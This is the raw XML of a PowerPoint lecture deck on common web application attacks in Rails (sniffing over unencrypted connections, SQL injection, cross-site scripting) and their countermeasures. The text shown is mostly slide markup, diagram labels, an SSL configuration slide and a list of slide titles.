              <a:ext cx="1160492" cy="601456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20782" y="5940523"/>
              <a:ext cx="1160492" cy="60330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77354" y="5877601"/>
              <a:ext cx="1160492" cy="601456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31514" y="5816529"/>
              <a:ext cx="1160492" cy="60330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281274" y="6014548"/>
              <a:ext cx="732243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4301781" y="6273637"/>
              <a:ext cx="71173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08" name="TextBox 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1233821" y="1839413"/>
              <a:ext cx="9541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Ye Olde</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
                <a:t>Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20509" name="TextBox 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1146690" y="326430"/>
              <a:ext cx="9630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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20510" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="234739" y="4045653"/>
              <a:ext cx="1309974" cy="527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Rails Router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20511" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2117390" y="4074677"/>
              <a:ext cx="11336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Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20512" name="TextBox 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1544071" y="5857623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View</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20513" name="TextBox 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3251034" y="583532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Model</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20514" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5241207" y="5932870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DB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H="1">
            <a:off x="4740275" y="2286000"/>
            <a:ext cx="965200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng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478463" y="1646238"/>
            <a:ext cx="3048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FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypt communications with SSL (HTTPS)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How to enable site-wide SSL in Rails</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21506" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5070475"/>
            <a:ext cx="8229600" cy="94615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Also requires config on production server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>E.g.: Signed certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2150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2113"/>
            <a:ext cx="9144000" cy="322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3768168" y="6367957"/>
            <a:ext cx="5375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Taken from https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>www.railstutorial.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>/book/ (3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> Ed.) Listing 7.26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See also http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>guides.rubyonrails.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>configuring.html#rails-general-configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="120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1947</TotalTime>
  <Words>843</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>173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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr> Black </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SWEBOK KAs covered so far</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>What potential attack happens here?</vt:lpstr>
      <vt:lpstr>What potential attack happens here?</vt:lpstr>
      <vt:lpstr>Example: Unsecured Sign-Up Page</vt:lpstr>
      <vt:lpstr>How to prevent?</vt:lpstr>
      <vt:lpstr>How to prevent?</vt:lpstr>
      <vt:lpstr>How to enable site-wide SSL in Rails</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>Why were the student records lost?</vt:lpstr>
      <vt:lpstr>Why were the student records lost?</vt:lpstr>
      <vt:lpstr>Imagine controller that looks up students by name</vt:lpstr>
      <vt:lpstr>Imagine controller that looks up students by name</vt:lpstr>
      <vt:lpstr>What if…?</vt:lpstr>
      <vt:lpstr>What if…?</vt:lpstr>
      <vt:lpstr>How to prevent SQL injection? </vt:lpstr>
      <vt:lpstr>How to prevent SQL injection? </vt:lpstr>
      <vt:lpstr>Translation becomes…</vt:lpstr>
      <vt:lpstr>Translation becomes…</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>Micropost Example: What if…?</vt:lpstr>
      <vt:lpstr>Micropost Example: What if…?</vt:lpstr>
      <vt:lpstr>Malicious script runs when feed loads!</vt:lpstr>
      <vt:lpstr>How to prevent cross-site scripting (XSS)?</vt:lpstr>
      <vt:lpstr>How to prevent cross-site scripting (XSS)?</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>CERT Top 10 Software Security Practices</vt:lpstr>
      <vt:lpstr>For more attacks and countermeasures, see the Rails Security Guide  http://guides.rubyonrails.org/security.html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</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-30T16:57:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-18T20:29:29Z</dcterms:modified>
</cp:coreProperties>
</file>